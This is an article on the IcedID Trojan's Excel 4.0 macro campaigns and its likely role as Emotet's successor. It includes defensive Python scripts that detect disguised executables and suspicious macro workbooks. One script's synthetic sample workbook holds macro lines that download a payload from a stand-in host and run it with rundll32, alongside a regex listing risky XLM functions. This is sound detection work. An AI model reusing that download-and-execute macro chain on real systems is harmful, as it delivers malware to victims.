IcedID Trojan – a replacement for Emotet?

The IcedID Malware

The IcedID malware has been observed spreading through Excel attachments that carry Excel 4.0 (XLM) macros, delivered to users in malicious emails. IcedID itself is not new (it was first documented in 2017), but the current campaigns bear strong similarities to, and operate much like, the Emotet Trojan, which was taken down earlier this year.


Like Emotet, IcedID (also known as BokBot) is modular malware that started life as a banking Trojan, stealing financial data from its victims for use in banking fraud. Over time, its operators increasingly used it as a dropper that delivers other malicious programs onto victims' systems.

Experts note that the frequency of IcedID attacks has increased significantly over the last couple of months, driven by several spam email campaigns that deliver infected Excel spreadsheet attachments containing malicious macros.

According to Uptycs researchers Abhijit Mohanta and Ashwin Vamshi, the first three months of 2021 saw over 15,000 HTTP requests that came from approximately 4,000 infected files. Most of those files were Excel spreadsheets with the .XLS or the .XLSM extensions.

Once the targeted user opens such a file, they are asked to click an "Enable Content" button, supposedly to view the file's contents. That button is Excel's own macro security prompt, and clicking it executes the malicious Excel 4.0 macros.

According to Uptycs' analysis, the fact that Excel still supports the legacy Excel 4.0 macro language in both .XLS and .XLSM files is what lets the attackers embed arbitrary commands, through which they download malware onto the victim's machine from a set of URLs. Typically, those URLs point to legitimate websites that the attackers have compromised for the purpose of distributing malware.

Further investigation suggests that the different IcedID attacks were coordinated, given the similarities between the campaigns. For example, all documents used to deliver IcedID had generic business-themed names, such as "complaint and compensation claim", "claim" and "overdue". Another similarity is that the payloads fetched by those HTTP requests were always executables (.EXE or .DLL) disguised with fake extensions such as .JPG, .DAT or .GIF, intended to mislead the victim.
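The extension trick above is cheap to catch, because a Windows executable announces itself in its first bytes regardless of what the file is called. The following script is an added example written for this article, not Uptycs' tooling or IcedID code: it classifies a downloaded blob as EXE, DLL or not-PE purely from the DOS and PE headers, and flags any body served under an image or data extension that is actually a PE file. The download list, the hostname compromised-site.invalid and the header blobs are constructed sample data, not real captures.

```python
import os
import struct

# Benign-looking extensions the article reports IcedID payloads being served under.
DECOY_EXTENSIONS = {".jpg", ".gif", ".dat"}
IMAGE_FILE_DLL = 0x2000  # Characteristics flag in IMAGE_FILE_HEADER


def pe_kind(data: bytes):
    """Classify a blob by its headers alone: 'dll', 'exe', or None if it is not a PE file."""
    # DOS stub: 'MZ' magic, with e_lfanew (offset of the PE header) at 0x3C.
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    # PE signature (4 bytes) + IMAGE_FILE_HEADER (20 bytes) must fit inside the blob.
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    # Characteristics is 18 bytes into IMAGE_FILE_HEADER, i.e. 22 bytes past the signature.
    (characteristics,) = struct.unpack_from("<H", data, e_lfanew + 22)
    return "dll" if characteristics & IMAGE_FILE_DLL else "exe"


def is_disguised_executable(name: str, data: bytes) -> bool:
    """True when the name claims an image/data file but the content is a Windows executable."""
    ext = os.path.splitext(name.lower())[1]
    return ext in DECOY_EXTENSIONS and pe_kind(data) is not None


def triage_downloads(downloads):
    """Return (url, kind) for every fetched body whose extension lies about its type."""
    flagged = []
    for url, body in downloads:
        kind = pe_kind(body)
        if kind and is_disguised_executable(url.rsplit("/", 1)[-1], body):
            flagged.append((url, kind))
    return flagged


# --- constructed sample data (synthetic, not real captures) ---------------------------
def make_fake_pe(is_dll: bool) -> bytes:
    """Minimal synthetic PE header: just enough for pe_kind(); not a runnable binary."""
    blob = bytearray(0x80 + 24)
    blob[:2] = b"MZ"
    struct.pack_into("<I", blob, 0x3C, 0x80)  # e_lfanew -> 0x80
    blob[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<H", blob, 0x80 + 22, IMAGE_FILE_DLL if is_dll else 0x0102)
    return bytes(blob)


SAMPLE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 60  # real JPEG magic, dummy body

SAMPLE_DOWNLOADS = [
    ("http://compromised-site.invalid/images/overdue.jpg", make_fake_pe(is_dll=True)),
    ("http://compromised-site.invalid/images/logo.jpg", SAMPLE_JPEG),
    ("http://compromised-site.invalid/files/claim.dat", make_fake_pe(is_dll=False)),
    ("http://compromised-site.invalid/files/truncated.gif", b"MZ" + b"\x00" * 10),
]

if __name__ == "__main__":
    for url, kind in triage_downloads(SAMPLE_DOWNLOADS):
        print(f"{kind.upper()} served as {url.rsplit('/', 1)[-1]}: {url}")
```

The same check belongs at a web proxy or in a sandbox's network log: a body that starts with MZ and carries a valid PE signature is an executable no matter what Content-Type or filename accompanies it, and the DLL flag tells you whether to expect a rundll32-style loader in the macro.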

Furthermore, all of the macros relied on the same three techniques to evade detection: a white font on the white background, which makes the macro text invisible; splitting the macro across three separate hidden sheets; and shrinking the contents of cells so that their original contents are not readily visible.
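Because an .XLSM file is a zip archive of XML parts, every one of these tricks leaves a static trace that can be checked without opening the workbook in Excel. The script below is an added example written for this article, not Uptycs' tooling: it builds a constructed sample workbook in memory (a synthetic stand-in, not a real lure) and then inspects it for Excel 4.0 macro sheets (xl/macrosheets/, identified through the xlMacrosheet relationship type), sheets marked hidden or veryHidden, macro formulas that execute or download (EXEC, CALL, REGISTER and similar), fonts coloured white, and the shrink-to-fit alignment flag. Reading the article's "shrinking the cell contents" as Excel's shrink-to-fit flag is an assumption, and the sample hostname compromised-site.invalid is made up.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS_MAIN = "{http://schemas.openxmlformats.org/spreadsheetml/2006/main}"
NS_RELS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
NS_R = "{http://schemas.openxmlformats.org/officeDocument/2006/relationships}"
XLM_REL = "http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet"
# Excel 4.0 functions that let a macro sheet run code or reach the network/filesystem.
RISKY_XLM = re.compile(r"\b(EXEC|CALL|REGISTER|RUN|FOPEN|FWRITE)\s*\(", re.I)


def triage_xlsm(data: bytes) -> dict:
    """Static heuristics for the tricks described above; a hit is a triage lead, not proof."""
    f = {"macrosheets": [], "hidden_sheets": [], "risky_formulas": [],
         "white_font_ids": [], "shrink_to_fit": False}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        parts = set(z.namelist())
        # Relationships tell us which sheet parts are Excel 4.0 macro sheets.
        targets = {}
        for rel in ET.fromstring(z.read("xl/_rels/workbook.xml.rels")).iter(NS_RELS + "Relationship"):
            t = rel.get("Target")
            targets[rel.get("Id")] = (rel.get("Type"), t.lstrip("/") if t.startswith("/") else "xl/" + t)
        # workbook.xml carries each sheet's state: visible, hidden, or veryHidden (not unhidable from the UI).
        for sheet in ET.fromstring(z.read("xl/workbook.xml")).iter(NS_MAIN + "sheet"):
            rel_type, path = targets.get(sheet.get(NS_R + "id"), (None, None))
            is_macro = rel_type == XLM_REL
            if is_macro:
                f["macrosheets"].append((sheet.get("name"), path))
            state = sheet.get("state", "visible")
            if state != "visible":
                f["hidden_sheets"].append((sheet.get("name"), state, is_macro))
        # Formulas inside macro sheets that execute or download anything.
        for name, path in f["macrosheets"]:
            if path not in parts:
                continue
            for c in ET.fromstring(z.read(path)).iter(NS_MAIN + "c"):
                formula = c.find(NS_MAIN + "f")
                if formula is not None and formula.text and RISKY_XLM.search(formula.text):
                    f["risky_formulas"].append((name, c.get("r"), formula.text))
        # styles.xml: white fonts (invisible on a white sheet) and shrink-to-fit alignment
        # (assumption: that is what the article's "shrinking the cell contents" refers to).
        if "xl/styles.xml" in parts:
            styles = ET.fromstring(z.read("xl/styles.xml"))
            fonts = styles.find(NS_MAIN + "fonts")
            for i, font in enumerate(fonts if fonts is not None else []):
                color = font.find(NS_MAIN + "color")
                if color is not None and (color.get("rgb") or "").upper().endswith("FFFFFF"):
                    f["white_font_ids"].append(i)
            f["shrink_to_fit"] = any(a.get("shrinkToFit") == "1" for a in styles.iter(NS_MAIN + "alignment"))
    return f


def is_suspicious(f: dict) -> bool:
    """Macro sheet present AND (hidden macro sheet OR execution/download primitive): the pattern described above."""
    hidden_macro = any(is_macro for _, _, is_macro in f["hidden_sheets"])
    return bool(f["macrosheets"]) and (hidden_macro or bool(f["risky_formulas"]))


# --- constructed sample workbook (synthetic, not a real lure) -------------------------
def build_sample_xlsm() -> bytes:
    main = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
    xm = "http://schemas.microsoft.com/office/excel/2006/main"
    workbook = (f'<workbook xmlns="{main}" xmlns:r="{NS_R[1:-1]}"><sheets>'
                '<sheet name="Claim" sheetId="1" r:id="rId1"/>'
                '<sheet name="Sheet2" sheetId="2" state="veryHidden" r:id="rId2"/>'
                '<sheet name="Sheet3" sheetId="3" state="hidden" r:id="rId3"/></sheets></workbook>')
    rels = (f'<Relationships xmlns="{NS_RELS[1:-1]}"><Relationship Id="rId1" Target="worksheets/sheet1.xml" '
            'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet"/>'
            f'<Relationship Id="rId2" Type="{XLM_REL}" Target="macrosheets/sheet1.xml"/>'
            f'<Relationship Id="rId3" Type="{XLM_REL}" Target="/xl/macrosheets/sheet2.xml"/></Relationships>')
    macro1 = (f'<xm:macrosheet xmlns="{main}" xmlns:xm="{xm}"><sheetData>'
              '<row r="1"><c r="A1" s="1"><f>CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,'
              '"http://compromised-site.invalid/overdue.jpg","C:\\Users\\Public\\overdue.dat",0,0)</f></c></row>'
              '<row r="2"><c r="A2" s="1"><f>EXEC("rundll32 C:\\Users\\Public\\overdue.dat,DllRegisterServer")</f></c></row>'
              '</sheetData></xm:macrosheet>')
    macro2 = (f'<xm:macrosheet xmlns="{main}" xmlns:xm="{xm}"><sheetData>'
              '<row r="1"><c r="A1" s="1"><f>RETURN()</f></c></row></sheetData></xm:macrosheet>')
    styles = (f'<styleSheet xmlns="{main}"><fonts count="2"><font><color theme="1"/></font>'
              '<font><color rgb="FFFFFFFF"/></font></fonts><cellXfs count="2"><xf fontId="0"/>'
              '<xf fontId="1" applyAlignment="1"><alignment shrinkToFit="1"/></xf></cellXfs></styleSheet>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("xl/workbook.xml", workbook)
        z.writestr("xl/_rels/workbook.xml.rels", rels)
        z.writestr("xl/worksheets/sheet1.xml", f'<worksheet xmlns="{main}"><sheetData/></worksheet>')
        z.writestr("xl/macrosheets/sheet1.xml", macro1)
        z.writestr("xl/macrosheets/sheet2.xml", macro2)
        z.writestr("xl/styles.xml", styles)
    return buf.getvalue()


if __name__ == "__main__":
    findings = triage_xlsm(build_sample_xlsm())
    print("suspicious:", is_suspicious(findings), findings)
```

The strongest single signal is the presence of an xlMacrosheet relationship at all: ordinary business workbooks have no reason to contain Excel 4.0 macro sheets, so a mail gateway can quarantine on that alone and use the hidden-sheet, white-font and formula findings only to rank what an analyst looks at first. Legacy .XLS lures need a different parser (the OLE/BIFF container rather than zip and XML), which this example does not cover.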

IcedID and Emotet

Until its takedown in January 2021, Emotet was widely regarded as one of the most dangerous malware threats worldwide. While it was active, between 100,000 and 500,000 emails distributing it were sent out each day on average.

The Emotet Trojan was commonly used as a dropper that stealthily delivered additional threats to an already infected machine, among them the Ryuk ransomware, the Qakbot Trojan and the TrickBot Trojan. Its operators are also known to have rented the Trojan's infrastructure to other criminal actors as malware-as-a-service (MaaS).

At the start of this year, the global takedown "Operation LadyBird" disrupted the botnet infrastructure behind Emotet, with the aim of eliminating the majority of its active instances. The operation succeeded, and more than a million Emotet-infected endpoints were cut off from the botnet.

Based on the rapid increase in IcedID attacks, Uptycs researchers consider this Trojan a candidate to take Emotet's place.

Like Emotet before it, IcedID has recently been used in dropper attacks, serving as the first stage of an infection that delivers ransomware as the second stage. There are also reports that IcedID's infrastructure is offered as MaaS, with the operators renting it to other cybercriminals.

On the bright side, users and companies have a variety of effective options for protecting themselves against such well-known threats.

According to Dirk Schrader, global vice president of security research at New Net Technologies, threats such as Emotet and IcedID share characteristic traits that make protecting against them easier. For the attack to succeed, the Trojan dropper needs to make unauthorized changes to the system, which can be thwarted if proper system monitoring is applied. Companies should therefore have an adequate permissions and data-access policy across their infrastructure, so that not every user profile is allowed to make system changes; this in turn helps spot external and malicious attempts to add anything harmful to the system.


About the author

Brandon Skies

Brandon is a researcher and content creator in the fields of cyber-security and virtual privacy. Years of experience enable him to provide readers with important information and adequate solutions for the latest software and malware problems.
